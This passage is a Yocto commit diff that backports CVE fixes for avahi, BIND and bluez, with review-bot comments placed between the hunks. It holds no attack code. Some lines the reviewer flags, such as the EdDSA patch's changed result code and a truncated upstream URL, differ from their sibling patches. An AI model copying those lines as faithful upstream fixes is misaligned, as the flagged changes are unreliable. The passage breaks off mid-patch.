++++ avahi-0.7/avahi-common/alternative.c
+@@ -49,15 +49,20 @@ static void drop_incomplete_utf8(char *c
+ }
+
+ char *avahi_alternative_host_name(const char *s) {
++ char label[AVAHI_LABEL_MAX], alternative[AVAHI_LABEL_MAX*4+1];
++ char *alt, *r, *ret;
+ const char *e;
+- char *r;
++ size_t len;
+
+ assert(s);
+
+ if (!avahi_is_valid_host_name(s))
+ return NULL;
+
+- if ((e = strrchr(s, '-'))) {
++ if (!avahi_unescape_label(&s, label, sizeof(label)))
++ return NULL;
++
++ if ((e = strrchr(label, '-'))) {
+ const char *p;
+
+ e++;
+@@ -74,19 +79,18 @@ char *avahi_alternative_host_name(const
+
+ if (e) {
+ char *c, *m;
+- size_t l;
+ int n;
+
+ n = atoi(e)+1;
+ if (!(m = avahi_strdup_printf("%i", n)))
+ return NULL;
+
+- l = e-s-1;
++ len = e-label-1;
+
+- if (l >= AVAHI_LABEL_MAX-1-strlen(m)-1)
+- l = AVAHI_LABEL_MAX-1-strlen(m)-1;
++ if (len >= AVAHI_LABEL_MAX-1-strlen(m)-1)
++ len = AVAHI_LABEL_MAX-1-strlen(m)-1;
+
+- if (!(c = avahi_strndup(s, l))) {
++ if (!(c = avahi_strndup(label, len))) {
+ avahi_free(m);
+ return NULL;
+ }
+@@ -100,7 +104,7 @@ char *avahi_alternative_host_name(const
+ } else {
+ char *c;
+
+- if (!(c = avahi_strndup(s, AVAHI_LABEL_MAX-1-2)))
++ if (!(c = avahi_strndup(label, AVAHI_LABEL_MAX-1-2)))
+ return NULL;
+
+ drop_incomplete_utf8(c);
+@@ -109,6 +113,13 @@ char *avahi_alternative_host_name(const
+ avahi_free(c);
+ }
+
++ alt = alternative;
++ len = sizeof(alternative);
++ ret = avahi_escape_label(r, strlen(r), &alt, &len);
++
++ avahi_free(r);
++ r = avahi_strdup(ret);
++
+ assert(avahi_is_valid_host_name(r));
+
+ return r;
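Review bot: The block added at the end of avahi_alternative_host_name uses the results of `avahi_escape_label()` and `avahi_strdup()` without checking either, then passes `r` straight to `assert(avahi_is_valid_host_name(r))`. The CVE-2023-38470-2 patch in this commit treats a NULL return from `avahi_escape_label()` as a failure, so the same can happen here, and an allocation failure in the strdup would also leave `r` NULL. Returning early keeps a failed escape or allocation away from the assert: `if (!ret) return NULL;` after `avahi_free(r)`, and `if (!(r = avahi_strdup(ret))) return NULL;` in place of the bare assignment. `strlen(r)` on the line before assumes the earlier `avahi_strdup_printf()` calls succeeded; those lines are outside the hunks shown.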
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch b/meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch
new file mode 100644
index 0000000000..940c6776d3
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch
@@ -0,0 +1,67 @@
+From 36c878a0124973f29b7ca49e6bb18310f9b2601f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Micha=C5=82=20K=C4=99pie=C5=84?= <michal@isc.org>
+Date: Thu, 8 Sep 2022 11:11:30 +0200
+Subject: [PATCH 1/3] Bound the amount of work performed for delegations
+
+Limit the amount of database lookups that can be triggered in
+fctx_getaddresses() (i.e. when determining the name server addresses to
+query next) by setting a hard limit on the number of NS RRs processed
+for any delegation encountered. Without any limit in place, named can
+be forced to perform large amounts of database lookups per each query
+received, which severely impacts resolver performance.
+
+The limit used (20) is an arbitrary value that is considered to be big
+enough for any sane DNS delegation.
+
+(cherry picked from commit 3a44097fd6c6c260765b628cd1d2c9cb7efb0b2a)
+
+Upstream-Status: Backport
+CVE: CVE-2022-2795
+Reference to upstream patch:
+https://gitlab.isc.org/isc-projects/bind9/-/commit/bf2ea6d8525bfd96a84dad221ba9e004adb710a8
+
+Signed-off-by: Mathieu Dubois-Briand <mbriand@witekio.com>
+---
+ lib/dns/resolver.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+diff --git a/lib/dns/resolver.c b/lib/dns/resolver.c
+index 8ae9a993bbd7..ac9a9ef5d009 100644
+--- a/lib/dns/resolver.c
++++ b/lib/dns/resolver.c
+@@ -180,6 +180,12 @@
+ */
+ #define NS_FAIL_LIMIT 4
+ #define NS_RR_LIMIT 5
++/*
++ * IP address lookups are performed for at most NS_PROCESSING_LIMIT NS RRs in
++ * any NS RRset encountered, to avoid excessive resource use while processing
++ * large delegations.
++ */
++#define NS_PROCESSING_LIMIT 20
+
+ /* Number of hash buckets for zone counters */
+ #ifndef RES_DOMAIN_BUCKETS
+@@ -3318,6 +3324,7 @@ fctx_getaddresses(fetchctx_t *fctx, bool badcache) {
+ bool need_alternate = false;
+ bool all_spilled = true;
+ unsigned int no_addresses = 0;
++ unsigned int ns_processed = 0;
+
+ FCTXTRACE5("getaddresses", "fctx->depth=", fctx->depth);
+
+@@ -3504,6 +3511,11 @@ fctx_getaddresses(fetchctx_t *fctx, bool badcache) {
+
+ dns_rdata_reset(&rdata);
+ dns_rdata_freestruct(&ns);
++
++ if (++ns_processed >= NS_PROCESSING_LIMIT) {
++ result = ISC_R_NOMORE;
++ break;
++ }
+ }
+ if (result != ISC_R_NOMORE) {
+ return (result);
+--
+2.34.1
+
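Review bot: The early exit added to the NS loop in fctx_getaddresses sets `result = ISC_R_NOMORE` before `break`, which makes a truncated walk look like a normal end of the RRset, and nothing in the code says this is deliberate. A comment inside the new block would explain why the limit is not surfaced as an error, for example `/* Pretend the RRset ended so the check after the loop does not return early. */`. The function already emits trace output through FCTXTRACE5 at its start, so a trace line when the limit is hit would help operators notice delegations being cut at NS_PROCESSING_LIMIT; which trace macro fits is outside the hunk. The loop and the rest of fctx_getaddresses start and end outside the hunks.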
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch b/meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch
new file mode 100644
index 0000000000..0ef87fd260
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch
@@ -0,0 +1,31 @@
+From ef3d1a84ff807eea27b4fef601a15932c5ffbfbf Mon Sep 17 00:00:00 2001
+From: Mark Andrews <marka@isc.org>
+Date: Thu, 11 Aug 2022 15:15:34 +1000
+Subject: [PATCH 2/3] Free eckey on siglen mismatch
+
+Upstream-Status: Backport
+CVE: CVE-2022-38177
+Reference to upstream patch:
+https://gitlab.isc.org/isc-projects/bind9/-/commit/5b2282afff760b1ed3471f6666bdfe8e1d34e590
+
+Signed-off-by: Mathieu Dubois-Briand <mbriand@witekio.com>
+---
+ lib/dns/opensslecdsa_link.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/dns/opensslecdsa_link.c b/lib/dns/opensslecdsa_link.c
+index 83b5b51cd78c..7576e04ac635 100644
+--- a/lib/dns/opensslecdsa_link.c
++++ b/lib/dns/opensslecdsa_link.c
+@@ -224,7 +224,7 @@ opensslecdsa_verify(dst_context_t *dctx, const isc_region_t *sig) {
+ siglen = DNS_SIG_ECDSA384SIZE;
+
+ if (sig->length != siglen)
+- return (DST_R_VERIFYFAILURE);
++ DST_RET(DST_R_VERIFYFAILURE);
+
+ if (!EVP_DigestFinal_ex(evp_md_ctx, digest, &dgstlen))
+ DST_RET (dst__openssl_toresult3(dctx->category,
+--
+2.34.1
+
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch b/meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch
new file mode 100644
index 0000000000..e0b398e24a
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch
@@ -0,0 +1,33 @@
+From 65f5b2f0162d5d2ab25f463aa14a8bae71ace3d9 Mon Sep 17 00:00:00 2001
+From: Mark Andrews <marka@isc.org>
+Date: Thu, 11 Aug 2022 15:28:13 +1000
+Subject: [PATCH 3/3] Free ctx on invalid siglen
+
+(cherry picked from commit 6ddb480a84836641a0711768a94122972c166825)
+
+Upstream-Status: Backport
+CVE: CVE-2022-38178
+Reference to upstream patch:
+https://gitlab.isc.org/isc-projects/bind9/-/commit/1af23378ebb11da2eb0f412e4563d6
+
+Signed-off-by: Mathieu Dubois-Briand <mbriand@witekio.com>
+---
+ lib/dns/openssleddsa_link.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/dns/openssleddsa_link.c b/lib/dns/openssleddsa_link.c
+index 8b115ec283f0..b4fcd607c131 100644
+--- a/lib/dns/openssleddsa_link.c
++++ b/lib/dns/openssleddsa_link.c
+@@ -325,7 +325,7 @@ openssleddsa_verify(dst_context_t *dctx, const isc_region_t *sig) {
+ siglen = DNS_SIG_ED448SIZE;
+
+ if (sig->length != siglen)
+- return (DST_R_VERIFYFAILURE);
++ DST_RET(ISC_R_NOTIMPLEMENTED);
+
+ isc_buffer_usedregion(buf, &tbsreg);
+
+--
+2.34.1
+
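Review bot: The replacement line in openssleddsa_verify changes the result for a signature length mismatch from DST_R_VERIFYFAILURE to ISC_R_NOTIMPLEMENTED, although the subject only promises to free the context. The sibling ECDSA patch in this commit (CVE-2022-38177.patch) makes the same kind of fix and keeps the result code, `DST_RET(DST_R_VERIFYFAILURE);`. That line looks right here too, unless callers are meant to see a different result for a malformed EdDSA signature. The "Reference to upstream patch" URL also ends in a commit id shorter than the full hashes used elsewhere in this series, so the backport is worth comparing against the upstream change. The body of openssleddsa_verify, and whatever cleanup DST_RET performs, are outside the hunk.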
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch b/meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch
new file mode 100644
index 0000000000..6f6c104530
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch
@@ -0,0 +1,166 @@
+
+Upstream-Status: Backport [import from debian security.debian.org/debian-security/pool/updates/main/b/bind9/bind9_9.11.5.P4+dfsg-5.1+deb10u9.debian.tar.xz
+Upstream patch https://downloads.isc.org/isc/bind9/9.16.42/patches/0001-CVE-2023-2828.patch]
+Upstream Commit: https://github.com/isc-projects/bind9/commit/da0eafcdee52147e72d407cc3b9f179378ee1d3a
+CVE: CVE-2023-2828
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+
+---
+ lib/dns/rbtdb.c | 106 +++++++++++++++++++++++++++++++++-----------------------
+ 1 file changed, 63 insertions(+), 43 deletions(-)
+
+diff --git a/lib/dns/rbtdb.c b/lib/dns/rbtdb.c
+index b1b928c..3165e26 100644
+--- a/lib/dns/rbtdb.c
++++ b/lib/dns/rbtdb.c
+@@ -792,7 +792,7 @@ static void update_header(dns_rbtdb_t *rbtdb, rdatasetheader_t *header,
+ static void expire_header(dns_rbtdb_t *rbtdb, rdatasetheader_t *header,
+ bool tree_locked, expire_t reason);
+ static void overmem_purge(dns_rbtdb_t *rbtdb, unsigned int locknum_start,
+- isc_stdtime_t now, bool tree_locked);
++ size_t purgesize, bool tree_locked);
+ static isc_result_t resign_insert(dns_rbtdb_t *rbtdb, int idx,
+ rdatasetheader_t *newheader);
+ static void resign_delete(dns_rbtdb_t *rbtdb, rbtdb_version_t *version,
+@@ -6784,6 +6784,16 @@ addclosest(dns_rbtdb_t *rbtdb, rdatasetheader_t *newheader,
+
+ static dns_dbmethods_t zone_methods;
+
++static size_t
++rdataset_size(rdatasetheader_t *header) {
++ if (!NONEXISTENT(header)) {
++ return (dns_rdataslab_size((unsigned char *)header,
++ sizeof(*header)));
++ }
++
++ return (sizeof(*header));
++}
++
+ static isc_result_t
+ addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version,
+ isc_stdtime_t now, dns_rdataset_t *rdataset, unsigned int options,
+@@ -6932,7 +6942,8 @@ addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version,
+ }
+
+ if (cache_is_overmem)
+- overmem_purge(rbtdb, rbtnode->locknum, now, tree_locked);
++ overmem_purge(rbtdb, rbtnode->locknum, rdataset_size(newheader),
++ tree_locked);
+
+ NODE_LOCK(&rbtdb->node_locks[rbtnode->locknum].lock,
+ isc_rwlocktype_write);
+@@ -6947,9 +6958,14 @@ addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version,
+ cleanup_dead_nodes(rbtdb, rbtnode->locknum);
+
+ header = isc_heap_element(rbtdb->heaps[rbtnode->locknum], 1);
+- if (header && header->rdh_ttl < now - RBTDB_VIRTUAL)
+- expire_header(rbtdb, header, tree_locked,
+- expire_ttl);
++ if (header != NULL) {
++ dns_ttl_t rdh_ttl = header->rdh_ttl;
++
++ if (rdh_ttl < now - RBTDB_VIRTUAL) {
++ expire_header(rbtdb, header, tree_locked,
++ expire_ttl);
++ }
++ }
+
+ /*
+ * If we've been holding a write lock on the tree just for
+@@ -10388,54 +10404,58 @@ update_header(dns_rbtdb_t *rbtdb, rdatasetheader_t *header,
+ ISC_LIST_PREPEND(rbtdb->rdatasets[header->node->locknum], header, link);
+ }
+
++static size_t
++expire_lru_headers(dns_rbtdb_t *rbtdb, unsigned int locknum, size_t purgesize,
++ bool tree_locked) {
++ rdatasetheader_t *header, *header_prev;
++ size_t purged = 0;
++
++ for (header = ISC_LIST_TAIL(rbtdb->rdatasets[locknum]);
++ header != NULL && purged <= purgesize; header = header_prev)
++ {
++ header_prev = ISC_LIST_PREV(header, link);
++ /*
++ * Unlink the entry at this point to avoid checking it
++ * again even if it's currently used someone else and
++ * cannot be purged at this moment. This entry won't be
++ * referenced any more (so unlinking is safe) since the
++ * TTL was reset to 0.
++ */
++ ISC_LIST_UNLINK(rbtdb->rdatasets[locknum], header, link);
++ size_t header_size = rdataset_size(header);
++ expire_header(rbtdb, header, tree_locked, expire_lru);
++ purged += header_size;
++ }
++
++ return (purged);
++}
++
+ /*%
+- * Purge some expired and/or stale (i.e. unused for some period) cache entries
+- * under an overmem condition. To recover from this condition quickly, up to
+- * 2 entries will be purged. This process is triggered while adding a new
+- * entry, and we specifically avoid purging entries in the same LRU bucket as
+- * the one to which the new entry will belong. Otherwise, we might purge
+- * entries of the same name of different RR types while adding RRsets from a
+- * single response (consider the case where we're adding A and AAAA glue records
+- * of the same NS name).
+- */
++ * Purge some stale (i.e. unused for some period - LRU based cleaning) cache
++ * entries under the overmem condition. To recover from this condition quickly,
++ * we cleanup entries up to the size of newly added rdata (passed as purgesize).
++ *
++ * This process is triggered while adding a new entry, and we specifically avoid
++ * purging entries in the same LRU bucket as the one to which the new entry will
++ * belong. Otherwise, we might purge entries of the same name of different RR
++ * types while adding RRsets from a single response (consider the case where
++ * we're adding A and AAAA glue records of the same NS name).
++*/
+ static void
+-overmem_purge(dns_rbtdb_t *rbtdb, unsigned int locknum_start,
+- isc_stdtime_t now, bool tree_locked)
++overmem_purge(dns_rbtdb_t *rbtdb, unsigned int locknum_start, size_t purgesize,
++ bool tree_locked)
+ {
+- rdatasetheader_t *header, *header_prev;
+ unsigned int locknum;
+- int purgecount = 2;
++ size_t purged = 0;
+
+ for (locknum = (locknum_start + 1) % rbtdb->node_lock_count;
+- locknum != locknum_start && purgecount > 0;
++ locknum != locknum_start && purged <= purgesize;
+ locknum = (locknum + 1) % rbtdb->node_lock_count) {
+ NODE_LOCK(&rbtdb->node_locks[locknum].lock,
+ isc_rwlocktype_write);
+
+- header = isc_heap_element(rbtdb->heaps[locknum], 1);
+- if (header && header->rdh_ttl < now - RBTDB_VIRTUAL) {
+- expire_header(rbtdb, header, tree_locked,
+- expire_ttl);
+- purgecount--;
+- }
+-
+- for (header = ISC_LIST_TAIL(rbtdb->rdatasets[locknum]);
+- header != NULL && purgecount > 0;
+- header = header_prev) {
+- header_prev = ISC_LIST_PREV(header, link);
+- /*
+- * Unlink the entry at this point to avoid checking it
+- * again even if it's currently used someone else and
+- * cannot be purged at this moment. This entry won't be
+- * referenced any more (so unlinking is safe) since the
+- * TTL was reset to 0.
+- */
+- ISC_LIST_UNLINK(rbtdb->rdatasets[locknum], header,
+- link);
+- expire_header(rbtdb, header, tree_locked,
+- expire_lru);
+- purgecount--;
+- }
++ purged += expire_lru_headers(rbtdb, locknum, purgesize - purged,
++ tree_locked);
+
+ NODE_UNLOCK(&rbtdb->node_locks[locknum].lock,
+ isc_rwlocktype_write);
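Review bot: The new helper expire_lru_headers has no header comment, and two things a caller needs are only implicit. It unlinks entries from `rbtdb->rdatasets[locknum]`, and its one visible caller, overmem_purge, invokes it between NODE_LOCK and NODE_UNLOCK on that bucket, so the locking requirement should be stated, for example `/* Caller must hold the write lock for node_locks[locknum]. */`. Its loop condition is `purged <= purgesize`, so it expires at least one header whenever the list is non-empty and can overshoot purgesize by one entry; a sentence saying this is intended would help. The patch file also carries no From/Subject/Date header, unlike the other backports in this commit, so its origin rests only on the Upstream-Status lines.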
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch b/meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch
new file mode 100644
index 0000000000..be479cb00e
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch
@@ -0,0 +1,175 @@
+From c4fac5ca98efd02fbaef43601627c7a3a09f5a71 Mon Sep 17 00:00:00 2001
+From: Mark Andrews <marka@isc.org>
+Date: Tue, 20 Jun 2023 15:21:36 +1000
+Subject: [PATCH] Limit isccc_cc_fromwire recursion depth
+
+Named and rndc do not need a lot of recursion so the depth is
+set to 10.
+
+Taken from BIND 9.16.44 change.
+
+Upstream-Status: Backport [https://gitlab.isc.org/isc-projects/bind9/-/commit/c4fac5ca98efd02fbaef43601627c7a3a09f5a71]
+CVE: CVE-2023-3341
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/isccc/cc.c | 38 +++++++++++++++++++++++---------
+ lib/isccc/include/isccc/result.h | 4 +++-
+ lib/isccc/result.c | 4 +++-
+ 3 files changed, 34 insertions(+), 12 deletions(-)
+
+diff --git a/lib/isccc/cc.c b/lib/isccc/cc.c
+index e012685..8eac3d6 100644
+--- a/lib/isccc/cc.c
++++ b/lib/isccc/cc.c
+@@ -53,6 +53,10 @@
+
+ #define MAX_TAGS 256
+ #define DUP_LIFETIME 900
++#ifndef ISCCC_MAXDEPTH
++#define ISCCC_MAXDEPTH \
++ 10 /* Big enough for rndc which just sends a string each way. */
++#endif
+
+ typedef isccc_sexpr_t *sexpr_ptr;
+
+@@ -561,19 +565,25 @@ verify(isccc_sexpr_t *alist, unsigned char *data, unsigned int length,
+
+ static isc_result_t
+ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+- uint32_t algorithm, isccc_sexpr_t **alistp);
++ uint32_t algorithm, unsigned int depth, isccc_sexpr_t **alistp);
+
+ static isc_result_t
+-list_fromwire(isccc_region_t *source, isccc_sexpr_t **listp);
++list_fromwire(isccc_region_t *source, unsigned int depth,
++ isccc_sexpr_t **listp);
+
+ static isc_result_t
+-value_fromwire(isccc_region_t *source, isccc_sexpr_t **valuep) {
++value_fromwire(isccc_region_t *source, unsigned int depth,
++ isccc_sexpr_t **valuep) {
+ unsigned int msgtype;
+ uint32_t len;
+ isccc_sexpr_t *value;
+ isccc_region_t active;
+ isc_result_t result;
+
++ if (depth > ISCCC_MAXDEPTH) {
++ return (ISCCC_R_MAXDEPTH);
++ }
++
+ if (REGION_SIZE(*source) < 1 + 4)
+ return (ISC_R_UNEXPECTEDEND);
+ GET8(msgtype, source->rstart);
+@@ -591,9 +601,9 @@ value_fromwire(isccc_region_t *source, isccc_sexpr_t **valuep) {
+ } else
+ result = ISC_R_NOMEMORY;
+ } else if (msgtype == ISCCC_CCMSGTYPE_TABLE)
+- result = table_fromwire(&active, NULL, 0, valuep);
++ result = table_fromwire(&active, NULL, 0, depth + 1, valuep);
+ else if (msgtype == ISCCC_CCMSGTYPE_LIST)
+- result = list_fromwire(&active, valuep);
++ result = list_fromwire(&active, depth + 1, valuep);
+ else
+ result = ISCCC_R_SYNTAX;
+
+@@ -602,7 +612,7 @@ value_fromwire(isccc_region_t *source, isccc_sexpr_t **valuep) {
+
+ static isc_result_t
+ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+- uint32_t algorithm, isccc_sexpr_t **alistp)
++ uint32_t algorithm, unsigned int depth, isccc_sexpr_t **alistp)
+ {
+ char key[256];
+ uint32_t len;
+@@ -613,6 +623,10 @@ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+
+ REQUIRE(alistp != NULL && *alistp == NULL);
+
++ if (depth > ISCCC_MAXDEPTH) {
++ return (ISCCC_R_MAXDEPTH);
++ }
++
+ checksum_rstart = NULL;
+ first_tag = true;
+ alist = isccc_alist_create();
+@@ -628,7 +642,7 @@ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+ GET_MEM(key, len, source->rstart);
+ key[len] = '\0'; /* Ensure NUL termination. */
+ value = NULL;
+- result = value_fromwire(source, &value);
++ result = value_fromwire(source, depth + 1, &value);
+ if (result != ISC_R_SUCCESS)
+ goto bad;
+ if (isccc_alist_define(alist, key, value) == NULL) {
+@@ -661,14 +675,18 @@ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+ }
+
+ static isc_result_t
+-list_fromwire(isccc_region_t *source, isccc_sexpr_t **listp) {
++list_fromwire(isccc_region_t *source, unsigned int depth, isccc_sexpr_t **listp) {
+ isccc_sexpr_t *list, *value;
+ isc_result_t result;
+
++ if (depth > ISCCC_MAXDEPTH) {
++ return (ISCCC_R_MAXDEPTH);
++ }
++
+ list = NULL;
+ while (!REGION_EMPTY(*source)) {
+ value = NULL;
+- result = value_fromwire(source, &value);
++ result = value_fromwire(source, depth + 1, &value);
+ if (result != ISC_R_SUCCESS) {
+ isccc_sexpr_free(&list);
+ return (result);
+@@ -699,7 +717,7 @@ isccc_cc_fromwire(isccc_region_t *source, isccc_sexpr_t **alistp,
+ if (version != 1)
+ return (ISCCC_R_UNKNOWNVERSION);
+
+- return (table_fromwire(source, secret, algorithm, alistp));
++ return (table_fromwire(source, secret, algorithm, 0, alistp));
+ }
+
+ static isc_result_t
+diff --git a/lib/isccc/include/isccc/result.h b/lib/isccc/include/isccc/result.h
+index 6c79dd7..a85861c 100644
+--- a/lib/isccc/include/isccc/result.h
++++ b/lib/isccc/include/isccc/result.h
+@@ -47,8 +47,10 @@
+ #define ISCCC_R_CLOCKSKEW (ISC_RESULTCLASS_ISCCC + 4)
+ /*% Duplicate */
+ #define ISCCC_R_DUPLICATE (ISC_RESULTCLASS_ISCCC + 5)
++/*% Maximum recursion depth */
++#define ISCCC_R_MAXDEPTH (ISC_RESULTCLASS_ISCCC + 6)
+
+-#define ISCCC_R_NRESULTS 6 /*%< Number of results */
++#define ISCCC_R_NRESULTS 7 /*%< Number of results */
+
+ ISC_LANG_BEGINDECLS
+
+diff --git a/lib/isccc/result.c b/lib/isccc/result.c
+index 8419bbb..325200b 100644
+--- a/lib/isccc/result.c
++++ b/lib/isccc/result.c
+@@ -40,7 +40,8 @@ static const char *text[ISCCC_R_NRESULTS] = {
+ "bad auth", /* 3 */
+ "expired", /* 4 */
+ "clock skew", /* 5 */
+- "duplicate" /* 6 */
++ "duplicate", /* 6 */
++ "max depth", /* 7 */
+ };
+
+ static const char *ids[ISCCC_R_NRESULTS] = {
+@@ -50,6 +51,7 @@ static const char *ids[ISCCC_R_NRESULTS] = {
+ "ISCCC_R_EXPIRED",
+ "ISCCC_R_CLOCKSKEW",
+ "ISCCC_R_DUPLICATE",
++ "ISCCC_R_MAXDEPTH",
+ };
+
+ #define ISCCC_RESULT_RESULTSET 2
+--
+2.25.1
+
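Review bot: The depth counter added to value_fromwire, table_fromwire and list_fromwire counts calls rather than nesting levels. table_fromwire and list_fromwire pass `depth + 1` to value_fromwire, which passes `depth + 1` again when it descends into a table or list. Each nested container therefore consumes two steps, so an ISCCC_MAXDEPTH of 10 admits roughly half that many levels of nesting. The comment on the macro should say so, for example `/* Counts fromwire calls; each nested table or list uses two. */`, so nobody tunes the value expecting it to equal the nesting depth. The `#ifndef` guard lets a build override the limit, and the same comment could note that raising it loosens the recursion bound this patch introduces.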
diff --git a/meta/recipes-connectivity/bind/bind_9.11.22.bb b/meta/recipes-connectivity/bind/bind_9.11.37.bb
index 3b4a299b36..95bb5be005 100644
--- a/meta/recipes-connectivity/bind/bind_9.11.22.bb
+++ b/meta/recipes-connectivity/bind/bind_9.11.37.bb
@@ -1,9 +1,10 @@
SUMMARY = "ISC Internet Domain Name Server"
HOMEPAGE = "https://www.isc.org/bind/"
+DESCRIPTION = "BIND 9 provides a full-featured Domain Name Server system"
SECTION = "console/network"
LICENSE = "ISC & BSD"
-LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=bf39058a7f64b2a934ce14dc9ec1dd45"
+LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=89a97ebbf713f7125fe5c02223d3ae95"
DEPENDS = "openssl libcap zlib"
@@ -18,9 +19,14 @@ SRC_URI = "https://ftp.isc.org/isc/bind9/${PV}/${BPN}-${PV}.tar.gz \
file://0001-configure.in-remove-useless-L-use_openssl-lib.patch \
file://0001-named-lwresd-V-and-start-log-hide-build-options.patch \
file://0001-avoid-start-failure-with-bind-user.patch \
+ file://CVE-2022-2795.patch \
+ file://CVE-2022-38177.patch \
+ file://CVE-2022-38178.patch \
+ file://CVE-2023-2828.patch \
+ file://CVE-2023-3341.patch \
"
-SRC_URI[sha256sum] = "afc6d8015006f1cabf699ff19f517bb8fd9c1811e5231f26baf51c3550262ac9"
+SRC_URI[sha256sum] = "0d8efbe7ec166ada90e46add4267b7e7c934790cba9bd5af6b8380a4fbfb5aff"
UPSTREAM_CHECK_URI = "https://ftp.isc.org/isc/bind9/"
# stay at 9.11 until 9.16, from 9.16 follow the ESV versions divisible by 4
diff --git a/meta/recipes-connectivity/bluez5/bluez5.inc b/meta/recipes-connectivity/bluez5/bluez5.inc
index f34ba0dce5..74fd344170 100644
--- a/meta/recipes-connectivity/bluez5/bluez5.inc
+++ b/meta/recipes-connectivity/bluez5/bluez5.inc
@@ -7,6 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
file://COPYING.LIB;md5=fb504b67c50331fc78734fed90fb0e09 \
file://src/main.c;beginline=1;endline=24;md5=9bc54b93cd7e17bf03f52513f39f926e"
DEPENDS = "dbus glib-2.0"
+RDEPENDS:${PN} += "dbus"
PROVIDES += "bluez-hcidump"
RPROVIDES_${PN} += "bluez-hcidump"
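Review bot: The added `RDEPENDS:${PN} += "dbus"` uses the colon override syntax, while the neighbouring lines of the same file still use the underscore form (`RPROVIDES_${PN}`). If this branch's BitBake does not treat `:` as an override separator, the assignment would create a differently named variable and the runtime dependency on dbus would not reach the package. Writing it as `RDEPENDS_${PN} += "dbus"` keeps the file consistent; either way, confirm in the generated package metadata that dbus is listed.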
@@ -52,6 +53,13 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/bluetooth/bluez-${PV}.tar.xz \
${@bb.utils.contains('DISTRO_FEATURES', 'systemd', '', 'file://0001-Allow-using-obexd-without-systemd-in-the-user-sessio.patch', d)} \
file://0001-tests-add-a-target-for-building-tests-without-runnin.patch \
file://0001-test-gatt-Fix-hung-issue.patch \
+ file://CVE-2021-0129.patch \
+ file://CVE-2021-3588.patch \
+ file://CVE-2021-3658.patch \
+ file://CVE-2022-0204.patch \
+ file://CVE-2022-39176.patch \
+ file://CVE-2022-3637.patch \
+ file://CVE-2023-45866.patch \
"
S = "${WORKDIR}/bluez-${PV}"
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch
new file mode 100644
index 0000000000..b39730dc10
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch
@@ -0,0 +1,109 @@
+From 00da0fb4972cf59e1c075f313da81ea549cb8738 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Tue, 2 Mar 2021 11:38:33 -0800
+Subject: shared/gatt-server: Fix not properly checking for secure flags
+
+When passing the mask to check_permissions all valid permissions for
+the operation must be set including BT_ATT_PERM_SECURE flags.
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/patch/?id=00da0fb4972cf59e1c075f313da81ea549cb8738]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+CVE: CVE-2021-0129
+---
+ src/shared/att-types.h | 8 ++++++++
+ src/shared/gatt-server.c | 25 +++++++------------------
+ 2 files changed, 15 insertions(+), 18 deletions(-)
+
+diff --git a/src/shared/att-types.h b/src/shared/att-types.h
+index 7108b4e94..3adc05d9e 100644
+--- a/src/shared/att-types.h
++++ b/src/shared/att-types.h
+@@ -129,6 +129,14 @@ struct bt_att_pdu_error_rsp {
+ #define BT_ATT_PERM_WRITE_SECURE 0x0200
+ #define BT_ATT_PERM_SECURE (BT_ATT_PERM_READ_SECURE | \
+ BT_ATT_PERM_WRITE_SECURE)
++#define BT_ATT_PERM_READ_MASK (BT_ATT_PERM_READ | \
++ BT_ATT_PERM_READ_AUTHEN | \
++ BT_ATT_PERM_READ_ENCRYPT | \
++ BT_ATT_PERM_READ_SECURE)
++#define BT_ATT_PERM_WRITE_MASK (BT_ATT_PERM_WRITE | \
++ BT_ATT_PERM_WRITE_AUTHEN | \
++ BT_ATT_PERM_WRITE_ENCRYPT | \
++ BT_ATT_PERM_WRITE_SECURE)
+
+ /* GATT Characteristic Properties Bitfield values */
+ #define BT_GATT_CHRC_PROP_BROADCAST 0x01
+diff --git a/src/shared/gatt-server.c b/src/shared/gatt-server.c
+index b5f7de7dc..970c35f94 100644
+--- a/src/shared/gatt-server.c
++++ b/src/shared/gatt-server.c
+@@ -444,9 +444,7 @@ static void process_read_by_type(struct async_read_op *op)
+ return;
+ }
+
